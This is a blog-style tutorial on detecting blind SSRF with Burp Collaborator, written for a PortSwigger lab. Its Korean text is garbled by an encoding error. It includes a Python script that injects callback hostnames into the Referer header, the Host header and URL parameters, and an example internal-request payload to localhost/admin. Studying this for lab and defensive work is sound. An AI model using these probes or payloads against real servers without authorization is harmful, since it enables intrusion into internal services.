
Vulnerability Analysis - Blind SSRF with out-of-band detection (Burp Collaborator)

Janger 2025. 1. 10. 10:41

Burp์˜ Collaborator์„ ์ด์šฉํ•˜์—ฌ, ํƒ€๊ฒŸ ์„œ๋ฒ„์˜ SSRF์— ์ทจ์•ฝํ•œ์ง€ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ์Œ

 

Usage example)

When sending a request to target.com, place the URL copied from Collaborator ({random_strings}.oastify.com) into the Referer header, the Host header, any parameter that accepts a URL, and so on, then send the request. If an interaction shows up in the Collaborator tab (use Poll now), the web server has an SSRF vulnerability. Check the interaction type: a DNS-only interaction shows the name was resolved but no connection arrived (often a sign that outbound HTTP is blocked by egress filtering), whereas an HTTP interaction shows the server completed the fetch.

 

(The reason is that the target server makes a request to whatever URL it is given. If a request such as http://localhost/admin?changePassword=1234 can be sent through it and the normal action is carried out, the server is vulnerable to SSRF: the same fetch that reached Collaborator can reach internal services that are not exposed to the outside.)
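As an added example (not code from the original post or from PortSwigger), the following Python script automates the step above. It builds one probe per injection point (Referer header, Host header, each query parameter), each with its own subdomain of the Collaborator domain so that an interaction can be traced back to the header or parameter that triggered it, and it sorts the interactions you read from the Collaborator tab into HTTP (the server completed the fetch) versus DNS only. The Collaborator domain abc123xyz.oastify.com, the target URL and the interaction records in the script are placeholders constructed for the example.

```python
"""Blind SSRF probing with one OAST hostname per injection point.

Added example; not code from the original post or from PortSwigger. The
Collaborator domain, the target URL and the interaction records are
placeholders constructed for the example: in practice you paste the domain
from Burp's Collaborator tab and read interactions from the same tab.
"""
import re
import secrets
import urllib.request
from typing import Dict, List, Set
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

COLLAB_DOMAIN = "abc123xyz.oastify.com"            # placeholder Collaborator domain
TARGET = "https://target.com/product?productId=1"  # placeholder target, as in the post


def oast_host(point: str, nonce: str, collab_domain: str) -> str:
    """Unique OAST hostname for one injection point, e.g.
    referer-9f1c.abc123xyz.oastify.com. Any subdomain of the Collaborator
    domain is reported, so each probe can carry its own name."""
    label = re.sub(r"[^a-z0-9-]", "", point.lower())
    return f"{label}-{nonce}.{collab_domain}".lower()


def build_probes(target: str, collab_domain: str, nonce: str = ""):
    """Build one request per injection point (Referer, Host, each query
    parameter). Returns (probes, mapping): probes are request dicts, mapping
    is {oast hostname: injection point} for decoding interactions later."""
    nonce = nonce or secrets.token_hex(2)
    parts = urlsplit(target)
    query = parse_qsl(parts.query, keep_blank_values=True)
    probes: List[dict] = []
    mapping: Dict[str, str] = {}

    def record(point: str, url: str, headers: dict, host: str) -> None:
        mapping[host] = point
        probes.append({"point": point, "url": url, "headers": headers, "oast": host})

    # 1. Referer header: what the lab's analytics component fetches.
    host = oast_host("referer", nonce, collab_domain)
    record("referer", target, {"Referer": f"http://{host}/"}, host)
    # 2. Host header: some back ends build absolute URLs from it.
    host = oast_host("host", nonce, collab_domain)
    record("host", target, {"Host": host}, host)
    # 3. Each query parameter in turn, so a hit names the parameter.
    for i, (name, _value) in enumerate(query):
        point = f"param-{name}"
        host = oast_host(point, nonce, collab_domain)
        patched = query[:i] + [(name, f"http://{host}/")] + query[i + 1:]
        url = urlunsplit(parts._replace(query=urlencode(patched)))
        record(point, url, {}, host)
    return probes, mapping


def classify_interactions(interactions, mapping) -> Dict[str, Set[str]]:
    """Map Collaborator interactions back to injection points.
    interactions: iterable of (type, hostname) as listed in the Collaborator
    tab, e.g. ("DNS", "referer-9f1c.abc123xyz.oastify.com").
    Returns {injection point: {"DNS", "HTTP", ...}}. Hostnames that are not in
    the mapping (another tester's probes, a typo) are ignored."""
    hits: Dict[str, Set[str]] = {}
    for kind, hostname in interactions:
        point = mapping.get(hostname.lower().rstrip("."))
        if point is not None:
            hits.setdefault(point, set()).add(kind.upper())
    return hits


def confirmed_fetch(hits: Dict[str, Set[str]]) -> List[str]:
    """Injection points with an HTTP interaction: the server completed the
    fetch. DNS-only points show the name was resolved but no connection
    arrived, often a sign of egress filtering; still worth reporting."""
    return sorted(p for p, kinds in hits.items() if "HTTP" in kinds)


def send_probes(probes, timeout: float = 10.0) -> None:
    """Fire the probes (network access required). The response body is
    irrelevant for blind SSRF; the evidence arrives at Collaborator."""
    for probe in probes:
        req = urllib.request.Request(probe["url"], headers=probe["headers"])
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                print(f"{probe['point']:<16} -> HTTP {resp.status}, poll Collaborator for {probe['oast']}")
        except Exception as exc:  # a 4xx/5xx or timeout does not mean the fetch failed
            print(f"{probe['point']:<16} -> {exc}, poll Collaborator for {probe['oast']}")


if __name__ == "__main__":
    probes, mapping = build_probes(TARGET, COLLAB_DOMAIN)
    send_probes(probes)
    # After "Poll now" in the Collaborator tab, paste the interactions here.
    observed = [("DNS", probes[0]["oast"]), ("HTTP", probes[0]["oast"])]  # constructed sample
    hits = classify_interactions(observed, mapping)
    print("confirmed fetch via:", confirmed_fetch(hits))
```

Keeping one hostname per injection point matters when several probes are fired in a batch: a bare {random_strings}.oastify.com would tell you that the server fetched something, but not which header or parameter carried the payload.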

 

 

https://www.youtube.com/watch?v=-iNidz-O2FY

 

 

https://portswigger.net/blog/introducing-burp-collaborator

Introducing Burp Collaborator (portswigger.net)

 

Lab

 

https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection

Lab: Blind SSRF with out-of-band detection | Web Security Academy (portswigger.net): This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this ...
